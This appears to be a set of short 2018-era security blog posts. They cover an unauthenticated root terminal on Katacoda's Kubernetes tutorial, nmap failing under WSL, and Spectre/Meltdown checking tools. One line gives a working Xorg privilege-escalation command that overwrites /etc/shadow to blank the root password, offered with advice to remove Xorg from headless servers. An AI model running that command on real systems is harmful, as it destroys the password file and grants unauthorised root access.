Recently, I’ve been reading up on containers and kubernetes. I have just discovered this. It just seems like it could be easily abused:
No authentication necessary. You simply click on Launch Terminal and you’ll get a root shell with full internet access.
https://kubernetes.io/docs/tutorials/hello-minikube/
(This is a frame from https://www.katacoda.com/ )
Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su
This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.
This is pretty neat:
However, I have a couple concerns. First, how useful will it be? Currently on a Windows 10 system, I have WSL setup and nmap is essentially useless:
tester@Win10virtual:~$ sudo nmap -sP -n -T4 192.168.1.254
Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-06 14:10 STD
dnet: Failed to open device eth0
QUITTING!
There is discussion about this issue here:
https://github.com/Microsoft/WSL/issues/1349
There is discussion of other network tools having socket related issues.
Second, how will AV handle tools like metasploit, powersploit, social engineering toolkit and the like that may set off AV engines?
I honestly think WSL is awesome but at this point I would recommend running whatever Linux distro of your desire on VirtualBox or the like.
Great article:
https://www.cyberciti.biz/faq/check-linux-server-for-spectre-meltdown-vulnerability/
Intel has also released a microcode update:
https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File
How does it affect performance on Windows systems? According to Microsoft:
#Update 1/17/2018 Tool for checking on Windows systems:
http://www.guru3d.com/news-story/download-inspectre-meltdown-and-spectre-check-tool.html
sha1sum ‘[Guru3D]-InSpectre.exe’
6a3f1382f3c9c1fd53bf4c3708e3a449cbcb136f [Guru3D]-InSpectre.exe
